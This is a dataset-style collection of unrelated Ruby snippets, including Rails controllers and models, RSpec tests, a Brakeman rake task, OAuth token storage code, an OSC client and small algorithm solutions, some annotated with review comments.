text stringlengths 10 2.61M |
|---|
desc 'check code with brakeman'
task :brakeman do
  require 'brakeman'
  result = Brakeman.run app_path: '.', print_report: true
  # BUG FIX: Brakeman's constant is Warnings_Found_Exit_Code; the original
  # `Warnings_FoundExit_Code` raised NameError exactly when warnings existed,
  # masking the intended non-zero exit.
  exit Brakeman::Warnings_Found_Exit_Code unless result.filtered_warnings.empty?
end
|
# @param {Integer} amount
# @param {Integer[]} coins
# @return {Integer}
# Counts the distinct combinations of coins that sum to `amount`
# (unbounded knapsack / LeetCode 518 "Coin Change 2").
#
# Fixes over the original: removes the leftover debug `p dp`, returns an
# explicit expression instead of relying on `for`-loop variable leakage
# for `dp[i][j]`, and uses a 1-D table (O(amount) memory).
#
# @param {Integer} amount
# @param {Integer[]} coins
# @return {Integer} number of combinations (1 when amount is 0)
def change(amount, coins)
  # dp[j] == number of ways to form amount j with the coins seen so far.
  dp = Array.new(amount + 1, 0)
  dp[0] = 1 # one way to form 0: use no coins
  coins.each do |coin|
    # Ascending j lets each denomination be reused an unlimited number
    # of times (combinations, not permutations).
    (coin..amount).each do |j|
      dp[j] += dp[j - coin]
    end
  end
  dp[amount]
end
amount = 6
coins = [1, 2, 5]
p change(amount, coins) |
# Domain errors. Subclass StandardError, not Exception: a bare `rescue`
# (as used by HandleExceptions below) only catches StandardError
# descendants, and Exception-level rescues would also swallow signals
# and SystemExit.
class UnformattedHtml < StandardError; end
class DocumentNotFound < StandardError; end
class ScraperNotFound < StandardError; end
module Myimdb
  # Mixin that wraps scraper accessor methods so any parsing failure
  # surfaces as a single domain-specific error (UnformattedHtml) instead
  # of whatever the underlying parser raised.
  module HandleExceptions
    # When false, wrapped methods swallow errors and return nil instead.
    EXCEPTIONS_ENABLED = true

    def self.included(base)
      base.send(:include, InstanceMethods)
      base.send(:extend, ClassMethods)
    end

    module InstanceMethods
    end

    module ClassMethods
      # Aliases each named method to `_name` and redefines it so that a
      # StandardError raised while scraping is re-raised as UnformattedHtml.
      def handle_exceptions_for(*method_names)
        method_names.each do |method_name|
          alias_method("_#{method_name}", method_name)
          # BUG FIX: forward arguments and blocks — the original wrapper
          # called `send("_#{name}")` with no args, silently breaking any
          # wrapped method that takes parameters.
          define_method(method_name) do |*args, &blk|
            begin
              send("_#{method_name}", *args, &blk)
            rescue StandardError
              if EXCEPTIONS_ENABLED
                raise UnformattedHtml.new("Unable to find tag: #{method_name}, probably you are parsing the wrong page.")
              else
                nil
              end
            end
          end
        end
      end
    end
  end

  module Scraper
    # Abstract base listing the scraping interface; concrete scrapers
    # (see .all) override these readers.
    class Base
      include HandleExceptions
      include Myimdb::Scraper::StringExtensions

      def name; end
      def directors; end
      def directors_with_url; end
      def writers; end
      def writers_with_url; end
      def rating; end
      def votes; end
      def genres; end
      def tagline; end
      def plot; end
      def year; end
      def release_date; end
      def image; end

      # Human-readable, column-aligned dump of the main fields.
      def summary
        [:directors, :writers, :rating, :votes, :genres, :tagline, :plot, :year, :release_date].collect do |meth|
          data = send(meth)
          data = data.join(", ") if Array === data
          sprintf("%-15s : %s", meth.to_s.capitalize, data)
        end.join("\n")
      end

      # Same fields as #summary, as a Hash keyed by method name.
      def to_hash
        movie_as_hash = {}
        [:directors, :writers, :rating, :votes, :genres, :tagline, :plot, :year, :release_date].each do |meth|
          movie_as_hash[meth] = send(meth)
        end
        movie_as_hash
      end

      # Names of the available concrete scraper classes.
      def self.all
        ['Freebase', 'Metacritic', 'RottenTomatoes', 'Imdb']
      end
    end
  end
end
describe 'Extraction au format :html' do
# Méthode principale pour construire le div qui contient
# un label et une valeur
# Builds the <div class="libval"> fragment that holds a label/value
# pair, exactly as the HTML extractor is expected to emit it.
def div_libval label, valeur
  %(<div class="libval"><span class="label">#{label}</span><span class="value">#{valeur}</span></div>)
end
before(:all) do
@collecte = Collecte.new(folder_test_2)
@collecte.parse
end
let(:collecte) { @collecte }
let(:film) { @film ||= collecte.film }
let(:code) { @code }
describe 'de toutes les données' do
before(:all) do
File.unlink(@collecte.extractor(:html).final_file.path) if File.exist?(@collecte.extractor(:html).final_file.path)
expect(File.exist? @collecte.extractor(:html).final_file.path).to eq false
@collecte.extract(format: :html, open_file: false)
col = Collecte.new(folder_test_2)
col.film.load
col.extract(format: :html, open_file: false)
@code = File.read(col.extractor(:html).final_file.path)
end
it 'produit le fichier contenant les données extraites' do
expect(File.exist? collecte.extractor(:html).final_file.path).to eq true
end
describe 'produit un fichier contenant' do
it 'la balise générale du doctype' do
expect(code).to include '<!DOCTYPE'
end
it 'la balise générale <html>' do
expect(code).to include '<html lang="fr">'
expect(code).to include '</html>'
end
it 'la balise <head>' do
expect(code).to include '<head>'
expect(code).to include '</head>'
end
it 'la marque principale du film' do
expect(code).to include 'FILM : Everest2016'
end
describe 'la métadonnée ' do
it 'identifiant du film' do
expect(code).to include div_libval('id', 'Everest2016')
end
it 'titre du film' do
expect(code).to include div_libval('titre', 'Éverest')
end
it 'auteurs de la collecte' do
expect(code).to include div_libval('auteurs', 'Phil et Benoit')
end
it 'date de début de collecte' do
expect(code).to include div_libval('debut', '25/4/2017')
end
it 'date de fin de collecte' do
expect(code).to include div_libval('fin', '30/4/2017')
end
end
# /describe la métadonnée
describe 'les données personnages' do
it 'le titre de la section' do
expect(code).to include '=== PERSONNAGES ==='
end
it 'les données des personnages' do
[
{
id: 'prota', prenom:'Prénom1', nom:'Nom Du Protagoniste',
pseudo:'Le Protagoniste', sexe:'Homme', annee:2000,
fonction:'Protagoniste', description:'Description du protagoniste.'
},
{
id: 'anta', prenom:'Prénom2', nom:'Nom De l\'Antagoniste',
sexe:'Femme',
fonction:'Antagoniste', description:'Description de l\'antagoniste.'
}
].each do |hperso|
expect(code).to match /^<div(.*?)>Personnage #{hperso[:id]}<\/div>$/
hperso.each do |prop,valu|
expect(code).to include div_libval(prop, valu)
end
end
end
end
# /Personnages
describe 'les données des brins' do
it 'le titre de la section' do
expect(code).to include '=== BRINS ==='
end
[
{
id:1, libelle:'Premier brin',
description:'Description du premier brin.'
},
{
id:2, libelle:'Deuxième brin',
description:'Une description du deuxième brin.'
},
{id:3, libelle:'Troisième brin', description:''},
{id:4, libelle:'Quatrième brin', description:''},
{
id:5, libelle:'Cinquième brin inutilisé par la collecte.',
description:''
}
].each do |hbrin|
it "le brin #{hbrin.inspect} est affiché correctement" do
expect(code).to match /<div(.*?)>Brin #{hbrin[:id]}<\/div>/
hbrin.each do |prop,valu|
expect(code).to include div_libval(prop, valu)
end
end
end
end
# /Brins
describe 'les données des décors' do
it 'le titre de la section' do
expect(code).to include '=== DÉCORS ==='
end
[
{
id: 1,
decor: 'MAISON DE JOE',
scenes_ids: '[1, 3, 4]',
},
{
id: 2, decor: 'JARDIN PUBLIC',
scenes_ids: '[2, 3]'
}
].each do |hdecor|
it "les données du décors #{hdecor.inspect}" do
expect(code).to match /<div(.*?)>Décor #{hdecor[:id]}<\/div>/
hdecor.each do |prop,valu|
expect(code).to include div_libval(prop, valu)
end
end
end
end
describe 'les données des scènes' do
it 'le titre de la section' do
expect(code).to include '=== SCENES ==='
end
[
{
id:1, numero:1,
resume: {:raw=>"Résumé de la première scène. b1 (6)", :notes_ids=>'[6]', :brins_ids=>'[1]', :scene_id=>'1'},
horloge:'0:00:30',
effet:'JOUR', decors_ids: '[1]',
brins_ids: '[1]', notes_ids: '[6]'
},
{
id:2, numero:2,
resume:{:raw=>'Résumé de la deuxième scène avec [PERSO#prota]. b2 b1', :brins_ids=>'[2, 1]', :scene_id=>'2'},
horloge: '0:01:40', effet:'NUIT',
decors_ids: '[2]',
brins_ids: '[2, 1]', notes_ids: '[4, 5, 6]',
paragraphes: [
{index:0, raw:'Premier beat de la deuxième scène avec [PERSO#anta].'},
{index:1, raw:'Deuxième beat de la deuxième scène avec [PERSO#prota]. (4)(5)(6)'},
{index:2, raw:'Troisième beat de la deuxième scène.'}
]
},
{
id:3, numero:3,
resume:{:raw=>'Résumé de la troisième. (3) b1 b3', :notes_ids=>'[3]', :brins_ids=>'[1, 3]', :scene_id=>3},
horloge:'0:03:20',
effet:'JOUR',
decors_ids:'[1, 2]',
brins_ids:'[1, 3, 2]', notes_ids:'[3, 1]',
paragraphes: [
{index:0, raw:'Paragraphe 1 de troisième. Avec première note. (1)'},
{index:1, raw:'Paragraphe 2 de troisième. Avec deuxième brin. b2'}
]
}
].each do |hscene|
it "les données de la scène ##{hscene[:id]}" do
expect(code).to match /<div(.*?)>Scene #{hscene[:numero]}<\/div>/
data_resume = hscene.delete(:resume)
data_paragraphes = hscene.delete(:paragraphes)
data_resume.each do |prop,valu|
expect(code).to include div_libval(prop, valu)
end
hscene.each do |prop,valu|
expect(code).to include div_libval(prop, valu)
end
# Test sur les paragraphes
if data_paragraphes
data_paragraphes.each do |hparag|
expect(code).to match /<div(.*?)>Paragraphe #{hparag[:index]}<\/div>/
expect(code).to include div_libval( 'raw', hparag[:raw] )
end
end
end
end
end
end
end
end
|
require "socket"

module Osc
  # Minimal OSC client: one connected UDP socket per Client instance.
  class Client
    def initialize(host, port)
      @udp = UDPSocket.new
      # connect fixes the peer, so #send below needs no destination args
      @udp.connect(host, port)
    end

    # Encodes and transmits one OSC message to the connected endpoint.
    # NOTE(review): this shadows Object#send for Client instances;
    # callers needing dynamic dispatch must use __send__/public_send.
    def send(address, messages)
      osc_message = Osc::Message.new(address, messages)
      @udp.send(osc_message.encode, 0)
    end
  end
end
class LikesController < ApplicationController
  before_action :find_post

  # POST — records at most one like per user per post, then returns to
  # the posts index either way.
  def create
    if already_liked?
      flash[:notice] = "You can't like more than once"
    else
      @post.likes.create(user_id: current_user.id)
    end
    redirect_to posts_path
  end

  private

  # Loads the post this like belongs to.
  def find_post
    @post = Post.find(params[:post_id])
  end

  # True when the current user already has a Like row for this post.
  def already_liked?
    Like.exists?(user_id: current_user.id, post_id: params[:post_id])
  end
end
|
desc "Upload release notes"
lane :upload_release_notes do
  # Re-uses deliver to push only metadata (release notes): the binary and
  # screenshots are skipped, and force: true suppresses the HTML-report
  # confirmation so the lane can run unattended.
  deliver(
    app_identifier: "com.example.MyApp",
    app_version: get_version_number(target: "MyApp"),
    force: true,
    skip_binary_upload: true,
    skip_screenshots: true,
    metadata_path: "fastlane/metadata",
  )
end
|
require 'spec_helper'

# Specs for the Comments::Create service object.
describe 'Comments SO' do
  let(:user) { FactoryGirl.create(:user) }
  let(:image) { FactoryGirl.create :user_image, user: user }
  let(:parameters) do
    {
      user_id: user.id,
      user_image_id: image.id,
      content: 'test'
    }
  end
  describe 'parent valid' do
    # let! forces creation before each example so the count checks hold
    let!(:comment) { Comments::Create.run(parameters).result }
    it { expect(Comment.count).to eq 1 }
    it { expect(comment.content).to include 'test' }
    describe 'with child' do
      let(:new_parameters) { parameters.merge parent_id: comment.id }
      let!(:child) { Comments::Create.run(new_parameters).result }
      it { expect(Comment.count).to eq 2 }
      it { expect(child.parent_id).to eq comment.id }
    end
  end
  describe 'parent invalid' do
    before { parameters[:content] = nil }
    # NOTE(review): unlike above, `comment` here is the outcome object
    # (no .result), and `expect(comment.valid?).to be nil` reads odd —
    # presumably `be false` (or asserting .result is nil) was intended.
    # TODO confirm against Comments::Create's API.
    let!(:comment) { Comments::Create.run(parameters) }
    it { expect(Comment.count).to eq 0 }
    it { expect(comment.valid?).to be nil }
  end
end
|
# URL-shortener record: maps a generated short code to a long URL and
# tracks visits through the Visit join model.
class ShortenedUrl < ActiveRecord::Base
  # NOTE: the original `include SecureRandom` was removed — SecureRandom
  # is a module of module-functions used below as SecureRandom.base64;
  # including it only polluted instances with private method copies.

  validates :long_url, presence: true, uniqueness: true
  validates :short_url, presence: true, uniqueness: true
  validates :user_id, presence: true

  # Visit rows recorded against this short code.
  has_many(
    :visitors,
    primary_key: :short_url,
    foreign_key: :short_url,
    class_name: :Visit
  )

  # The user who created this short URL.
  belongs_to(
    :submitter,
    primary_key: :id,
    foreign_key: :user_id,
    class_name: :User
  )

  # Generates a 16-byte base64 code, re-rolling on the rare collision.
  def self.random_code
    shortened_url = SecureRandom.base64(16)
    # `while exists?` replaces the double-negative `until !exists?`
    while exists?(short_url: shortened_url)
      shortened_url = SecureRandom.base64(16)
    end
    shortened_url
  end

  def self.create_for_user_and_long_url!(user_id, long_url)
    create!(long_url: long_url, short_url: random_code, user_id: user_id)
  end

  # Total visit count (not deduplicated).
  def num_clicks
    visitors.count
  end

  # Distinct visiting users over all time.
  def num_uniques
    visitors.select(:user_id).distinct.count
  end

  # Distinct visiting users within the last 10 minutes.
  def num_recent_uniques
    visitors.where(created_at: (10.minutes.ago)..Time.now).select(:user_id).distinct.count
  end
end
|
require 'test_helper'

module Radiator
  # Exercises the NetworkBroadcastApi RPC surface.
  class NetworkBroadcastApiTest < Radiator::Test
    def setup
      @api = Radiator::NetworkBroadcastApi.new
    end

    def test_method_missing
      assert_raises NoMethodError do
        @api.bogus
      end
    end

    # Every advertised RPC method name must be callable on the client.
    def test_all_respond_to
      @api.method_names.each do |key|
        assert @api.respond_to?(key), "expect rpc respond to #{key}"
      end
    end

    # Smoke-calls every method. WebMock blocking the connection or an
    # ArgumentError both count as success: the point is only that each
    # method exists and attempts a call, never that it completes.
    def test_all_methods
      unless defined? WebMock
        skip 'This test cannot run against testnet. It is only here to help locate newly added actions.'
      end
      @api.method_names.each do |key|
        begin
          assert @api.send key
          fail 'did not expect method with invalid argument to execute'
        rescue WebMock::NetConnectNotAllowedError => _
          # success
        rescue ArgumentError => _
          # success
        end
      end
    end

    def test_broadcast_transaction
      stub_post_empty
      response = @api.broadcast_transaction
      assert_equal response.class, Hashie::Mash, response.inspect
    end
  end
end
|
#ピタゴラスの三つ組(ピタゴラスの定理を満たす自然数)とはa<b<cで
#a² + b² = c²
#を満たす数の組である.
#
#例えば, 3² + 4² = 9 + 16 = 25 = 5²である.
#a + b + c = 1000となるピタゴラスの
#三つ組が一つだけ存在する. このa,b,cの積を計算しなさい.
# Finds the Pythagorean triple a < b < c with a + b + c == side_sum
# (Project Euler #9 for side_sum = 1000) and prints its product.
class PitagorasCalculator
  def initialize(side_sum)
    @side_sum = side_sum
    calc
  end

  # Prints a * b * c. @a/@b/@c stay nil when no triple exists, in which
  # case this raises NoMethodError — same contract as the original stub.
  def print_answer
    p @a * @b * @c
  end

  private

  # Brute-force search (the original left this as an empty TODO): for
  # each a < b the third side is forced by the sum, so only the
  # Pythagorean condition needs checking. O(side_sum^2).
  def calc
    (1...@side_sum).each do |a|
      ((a + 1)...@side_sum).each do |b|
        c = @side_sum - a - b
        break if c <= b # c must be the largest side; larger b only shrinks c
        next unless check_pitagoras?(a, b, c)
        @a, @b, @c = a, b, c
        return
      end
    end
  end

  # BUG FIX: exponentiation is `**`; the original used `^`, which is
  # integer XOR in Ruby and made this check wrong for most inputs
  # (e.g. 3^2 == 1, not 9).
  def check_pitagoras?(a, b, c)
    a**2 + b**2 == c**2
  end
end
calc = PitagorasCalculator.new(1000)
calc.print_answer
|
module ThreeScale
module Backend
module OAuth
class Token
module Storage
include Configurable
# Default token size is 4K - 512 (to allow for some metadata)
MAXIMUM_TOKEN_SIZE = configuration.oauth.max_token_size || 3584
private_constant :MAXIMUM_TOKEN_SIZE
TOKEN_MAX_REDIS_SLICE_SIZE = 500
private_constant :TOKEN_MAX_REDIS_SLICE_SIZE
TOKEN_TTL_DEFAULT = 86400
private_constant :TOKEN_TTL_DEFAULT
TOKEN_TTL_PERMANENT = 0
private_constant :TOKEN_TTL_PERMANENT
Error = Class.new StandardError
InconsistencyError = Class.new Error
class << self
include Backend::Logging
include Backend::StorageHelpers
def create(token, service_id, app_id, user_id, ttl = nil)
raise AccessTokenFormatInvalid if token.nil? || token.empty? ||
!token.is_a?(String) || token.bytesize > MAXIMUM_TOKEN_SIZE
# raises if TTL is invalid
ttl = sanitized_ttl ttl
key = Key.for token, service_id
raise AccessTokenAlreadyExists.new(token) unless storage.get(key).nil?
value = Value.for(app_id, user_id)
token_set = Key::Set.for(service_id, app_id)
store_token token, token_set, key, value, ttl
ensure_stored! token, token_set, key, value
end
# Deletes a token
#
# Returns the associated [app_id, user_id] or nil
#
def delete(token, service_id)
key = Key.for token, service_id
val = storage.get key
if val
val = Value.from val
app_id = val.first
token_set = Key::Set.for(service_id, app_id)
existed, * = remove_a_token token_set, token, key
unless existed
logger.notify(InconsistencyError.new("Found OAuth token " \
"#{token} for service #{service_id} and app #{app_id} as " \
"key but not in set!"))
end
end
val
end
# Get a token's associated [app_id, user_id]
def get_credentials(token, service_id)
ids = Value.from(storage.get(Key.for(token, service_id)))
raise AccessTokenInvalid.new token if ids.first.nil?
ids
end
# This is used to list tokens by service, app and possibly user.
#
# Note: this deletes tokens that have not been found from the set of
# tokens for the given app - those have to be expired tokens.
def all_by_service_and_app(service_id, app_id, user_id = nil)
token_set = Key::Set.for(service_id, app_id)
deltokens = []
tokens_n_values_flat(token_set, service_id)
.select do |(token, _key, value, _ttl)|
app_id, uid = Value.from value
if app_id.nil?
deltokens << token
false
else
!user_id || uid == user_id
end
end
.map do |(token, _key, value, ttl)|
if user_id
Token.new token, service_id, app_id, user_id, ttl
else
Token.from_value token, service_id, value, ttl
end
end
.force.tap do
# delete expired tokens (nil values) from token set
deltokens.each_slice(TOKEN_MAX_REDIS_SLICE_SIZE) do |delgrp|
storage.srem token_set, delgrp
end
end
end
# Remove tokens by app_id and optionally user_id.
#
# If user_id is nil or unspecified, this will remove all app tokens
#
# Triggered by Application deletion.
#
# TODO: we could expose the ability to delete all tokens for a given
# user_id, but we are currently not doing that.
#
def remove_tokens(service_id, app_id, user_id = nil)
  # Modifier-if: `filter` stays nil when no user_id is given, which
  # makes remove_tokens_by drop the whole token set instead of
  # filtering token-by-token.
  filter = lambda do |_t, _k, v, _ttl|
    user_id == Value.from(v).last
  end if user_id
  remove_tokens_by service_id, app_id, &filter
end
private
# Remove all tokens or only those selected by a block
#
# I thought of leaving this one public, but remove_*_tokens removed
# my use cases for the time being.
def remove_tokens_by(service_id, app_id, &blk)
token_set = Key::Set.for(service_id, app_id)
# No block? Just remove everything and smile!
if blk.nil?
remove_whole_token_set(token_set, service_id)
else
remove_token_set_by(token_set, service_id, &blk)
end
end
def remove_token_set_by(token_set, service_id, &blk)
# Get tokens. Filter them. Group them into manageable groups.
# Extract tokens and keys into separate arrays, one for each.
# Remove tokens from token set (they are keys in a set) and token
# keys themselves.
tokens_n_values_flat(token_set, service_id, false)
.select(&blk)
.each_slice(TOKEN_MAX_REDIS_SLICE_SIZE)
.inject([[], []]) do |acc, groups|
groups.each do |token, key, _value|
acc[0] << token
acc[1] << key
end
acc
end
.each_slice(2)
.inject([]) do |acc, (tokens, keys)|
storage.pipelined do
if tokens && !tokens.empty?
storage.srem token_set, tokens
acc.concat tokens
end
storage.del keys if keys && !keys.empty?
end
acc
end
end
def remove_a_token(token_set, token, key)
storage.pipelined do
storage.srem token_set, token
storage.del key
end
end
def remove_whole_token_set(token_set, service_id)
_token_groups, key_groups = tokens_n_keys(token_set, service_id)
storage.pipelined do
storage.del token_set
# remove all tokens for this app
key_groups.each do |keys|
storage.del keys
end
end
end
# TODO: provide a SSCAN interface with lazy enums because SMEMBERS
# is prone to DoSing and timeouts
def tokens_from(token_set)
# It is important that we make this a lazy enumerator. The
# laziness is maintained until some enumerator forces execution or
# the caller calls 'to_a' or 'force', whichever happens first.
storage.smembers(token_set).lazy
end
def tokens_n_keys(token_set, service_id)
token_groups = tokens_from(token_set).each_slice(TOKEN_MAX_REDIS_SLICE_SIZE)
key_groups = token_groups.map do |tokens|
tokens.map do |token|
Key.for token, service_id
end
end
# Note: this is returning two lazy enumerators
[token_groups, key_groups]
end
# Provides grouped data (as sourced from the lazy iterators) which
# matches respectively in each array position, ie. 1st group of data
# contains a group of tokens, keys and values with ttls, and
# position N of the tokens group has key in position N of the keys
# group, and so on.
#
# [[[token group], [key group], [value_with_ttls_group]], ...]
#
def tokens_n_values_groups(token_set, service_id, with_ttls)
token_groups, key_groups = tokens_n_keys(token_set, service_id)
value_ttl_groups = key_groups.map do |keys|
# pipelining will create an array with the results of commands
res = storage.pipelined do
storage.mget(keys)
if with_ttls
keys.map do |key|
storage.ttl key
end
end
end
# [mget array, 0..n ttls] => [mget array, ttls array]
[res.shift, res]
end
token_groups.zip(key_groups, value_ttl_groups)
end
# Zips the data provided by tokens_n_values_groups so that you stop
# looking at indexes in the respective arrays and instead have:
#
# [group 0, ..., group N] where each group is made of:
# [[token 0, key 0, value 0, ttl 0], ..., [token N, key N, value
# N, ttl N]]
#
def tokens_n_values_zipped_groups(token_set, service_id, with_ttls = true)
tokens_n_values_groups(token_set,
service_id,
with_ttls).map do |tokens, keys, (values, ttls)|
tokens.zip keys, values, ttls
end
end
# Flattens the data provided by tokens_n_values_zipped_groups so
# that you have a transparent iterator with all needed data and can
# stop worrying about streaming groups of elements.
#
def tokens_n_values_flat(token_set, service_id, with_ttls = true)
tokens_n_values_zipped_groups(token_set,
service_id,
with_ttls).flat_map do |groups|
groups.map do |token, key, value, ttl|
[token, key, value, ttl]
end
end
end
# Store the specified token in Redis
#
# TTL specified in seconds.
# A TTL of 0 stores a permanent token
def store_token(token, token_set, key, value, ttl)
# build the storage command so that we can pipeline everything cleanly
command = :set
args = [key]
if !permanent_ttl? ttl
command = :setex
args << ttl
end
args << value
# pipelined will return nil if it is embedded into another
# pipeline(which would be an error at this point) or if shutting
# down and a connection error happens. Both things being abnormal
# means we should just raise a storage error.
raise AccessTokenStorageError, token unless storage.pipelined do
storage.send(command, *args)
storage.sadd(token_set, token)
end
end
# Make sure everything ended up there
#
# TODO: review and possibly reimplement trying to leave it
# consistent as much as possible.
#
# Note that we have a sharding proxy and pipelines can't be guaranteed
# to behave like transactions, since we might have one non-working
# shard. Instead of relying on proxy-specific responses, we just check
# that the data we should have in the store is really there.
def ensure_stored!(token, token_set, key, value)
results = storage.pipelined do
storage.get(key)
storage.sismember(token_set, token)
end
results.last && results.first == value ||
raise(AccessTokenStorageError, token)
end
# Validation for the TTL value
#
# 0 is accepted (understood as permanent token)
# Negative values are not accepted
# Integer(ttl) validation is required (if input is nil, default applies)
# Validates and normalizes a token TTL.
#
#   nil                      => TOKEN_TTL_DEFAULT
#   0                        => accepted (permanent token)
#   negative / non-numeric   => AccessTokenInvalidTTL
def sanitized_ttl(ttl)
  sanitized = begin
                Integer(ttl)
              rescue TypeError
                # nil input: fall back to the default TTL
                TOKEN_TTL_DEFAULT
              rescue
                # unparseable (NaN-like) input: force the raise below
                -1
              end
  raise AccessTokenInvalidTTL if sanitized < 0
  sanitized
end
# Check whether a TTL has the magic value for a permanent token
# True when the TTL carries the magic value (TOKEN_TTL_PERMANENT, 0)
# that marks a token as never expiring.
def permanent_ttl?(ttl)
  ttl == TOKEN_TTL_PERMANENT
end
end
end
end
end
end
end
|
class Genre < ApplicationRecord
  # NOTE(review): artists are tied directly to a genre — presumably the
  # artists table carries a genre_id column; confirm the foreign key.
  has_many :artists
end
|
class Video < ActiveRecord::Base
  acts_as_decorables
  has_many :video_users
  has_many :users, through: :video_users

  # View count recorded for this video/user pair; 0 when the user has
  # never seen the video (no VideoUser row, or a nil views column).
  def how_many_times_seen_by(user)
    # find_by replaces the original where(...).first — same row, one
    # idiomatic call.
    VideoUser.find_by(video_id: id, user_id: user.id).try(:views) || 0
  end
end
|
require 'rails_helper'

# Authorization and side-effect specs for exam invitations: only
# superadmins may invite, with guards for self-invites and unknown users.
RSpec.describe ConsultantExamInvitationsController, type: :controller do
  describe "get #create" do
    let(:user) { create(:user, aasm_state: 'not_invited_to_exam') }
    let(:consultant) { create :consultant }
    let(:superadmin) { create :superadmin }
    it "should not let users in" do
      sign_in user
      post :create, user_id: consultant
      expect(response.status).to be(302)
      expect(controller).to set_flash[:alert].to(/not allowed/)
    end
    it "should not let consultants in" do
      sign_in consultant
      post :create, user_id: user
      expect(response.status).to be(302)
      expect(controller).to set_flash[:alert].to(/not allowed/)
    end
    it "should let in superadmins" do
      sign_in superadmin
      post :create, user_id: user
      expect(response.status).to be(302)
      expect(controller).to set_flash[:success].to(/Invitation sent/)
    end
    it "should send the email invite" do
      sign_in superadmin
      # inline! runs the Sidekiq mailer job synchronously so the
      # deliveries count changes within the example
      Sidekiq::Testing.inline! do
        expect do
          post :create, user_id: user
        end.to change{ ActionMailer::Base.deliveries.count }
      end
    end
    it "should block invitations to oneself" do
      sign_in superadmin
      post :create, user_id: superadmin
      expect(response.status).to be(302)
      expect(controller).to set_flash[:error].to(/can't invite yourself/)
    end
    it "should show user not found error message" do
      sign_in superadmin
      post :create, user_id: 999
      expect(response.status).to be(302)
      expect(controller).to set_flash[:error].to(/User not found/)
    end
    # NOTE(review): the final assertion checks `user.consultant?` — the
    # unrelated user fixture — rather than anything about `consultant`;
    # presumably a state/flag check on the invited consultant was meant.
    # TODO confirm intent.
    it "should work for right consultant" do
      sign_in superadmin
      post :create, user_id: consultant.id
      expect(response).to redirect_to admin_user_path(consultant)
      expect(user.consultant?).to be_falsy
    end
  end
end
|
# One field of a dynamic schema, embedded inside a ModelDefinition
# Mongoid document.
class FieldDefinition
  include Mongoid::Document
  # Permits setting attributes beyond the fields declared below.
  include Mongoid::Attributes::Dynamic
  field :name, type: String
  field :label, type: String
  field :field_type, type: String
  embedded_in :model_definition, inverse_of: :field_definitions
end
|
# Creates the courses table with 64-bit foreign keys to categories and
# users (creator).
class Courses < ActiveRecord::Migration[5.2]
  def change
    create_table :courses do |t|
      # limit: 8 => bigint FK columns; rewritten from the original's
      # mixed `:limit => 8` hash-rocket style for consistency with the
      # rest of the options.
      t.integer :category_id, null: false, limit: 8, index: true
      t.integer :creator_id, null: false, limit: 8, index: true
      t.string :title, index: true, null: false
      t.string :description, null: false
      t.timestamps
    end
    add_foreign_key :courses, :users, column: :creator_id
    add_foreign_key :courses, :categories
  end
end
|
# frozen_string_literal: true
# rubocop:disable Style/Documentation
class ApplicationController < ActionController::API
  before_action :check_mime_type
  before_action :check_data_type
  before_action :check_user_authentication

  private

  # 406 when a body-carrying request does not declare the JSON MIME type.
  def check_mime_type
    return unless %w[POST PUT PATCH].include? request.method
    head :not_acceptable if request.content_type != JSON_MIME_TYPE
  end

  # 409 unless the JSON:API `data.type` matches the controller name.
  def check_data_type
    return unless %w[POST PUT PATCH DELETE].include? request.method
    head :conflict if params.dig('data', 'type') != params[:controller]
  end

  # Resolves @current_user / @target_user from the API key header.
  # Guest tokens pass through with no user.
  def check_user_authentication
    token = request.headers[API_KEY_HEADER]
    return if check_guest(token)
    @current_user = resolve_current_user(token)
    # BUG FIX: the original `head :forbidden && return if ...` parsed as
    # `head(:forbidden && return)` — `return` executed before `head`, so
    # unauthenticated requests fell through without a 403 ever being
    # rendered. Render first, then bail out.
    if @current_user.nil?
      head :forbidden
      return
    end
    @target_user = resolve_target_user
  rescue ActiveRecord::RecordNotFound
    head :not_found
  end

  # nil for blank tokens; otherwise the matching user or nil.
  def resolve_current_user(token)
    return if token.blank?
    User.find_by token: token
  end

  # Flags (and memoizes) whether the request authenticated as guest.
  def check_guest(token)
    @is_guest = token == GUEST_API_KEY
    @is_guest
  end

  def check_guest_access
    head :forbidden unless @is_guest
  end

  def check_super_access
    head :forbidden unless @current_user&.admin_role? == true
  end

  # The addressed user: the current user itself, or any user when the
  # current user is an admin; nil otherwise.
  def resolve_target_user
    return if params[:id].nil?
    if @current_user[:id].to_i == params[:id].to_i
      @current_user
    elsif @current_user.admin_role?
      User.find(params['id'])
    end
  end

  def check_target_user
    head :forbidden if @is_guest || @target_user.nil?
  end

  def default_meta
    {
      logged_in: !@current_user.nil?
    }
  end

  # will_paginate-style pagination envelope for collection responses.
  def pagination_meta(entity)
    {
      total_pages: entity.total_pages,
      next_page: entity.next_page,
      current_page: entity.current_page,
      previous_page: entity.previous_page,
      total_entries: entity.total_entries
    }
  end

  def render_error(resource, status)
    render json: resource,
           status: status,
           adapter: :json_api,
           serializer: ActiveModel::Serializer::ErrorSerializer
  end
end
# rubocop:enable Style/Documentation
|
class ApplicationController < ActionController::Base
  before_action :configure_permitted_parameters, if: :devise_controller?
  before_action :authenticate_user!

  protected

  # Allow extra profile fields through Devise's account_update.
  def configure_permitted_parameters
    devise_parameter_sanitizer.permit(:account_update, keys: [:role, :department, :name])
  end

  # Restricts product access to users whose e-mail domain matches the
  # product owner's domain.
  def must_be_same_company
    # BUG FIX: Product.find raises RecordNotFound instead of returning a
    # blank record, so the params[:product_id] fallback below was dead
    # code. find_by returns nil and lets the fallback actually run.
    @product = Product.find_by(id: params[:id])
    if @product.blank?
      @product = Product.find(params[:product_id])
    end
    user_domain = current_user.email.split("@").last
    product_owner_domain = @product.user.email.split("@").last
    redirect_to products_path, notice: 'Produto inexistente' if user_domain != product_owner_domain
  end
end
|
# The MIT License (MIT)
# Copyright (c) 2013 alisdair sullivan <alisdairsullivan@yahoo.ca>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
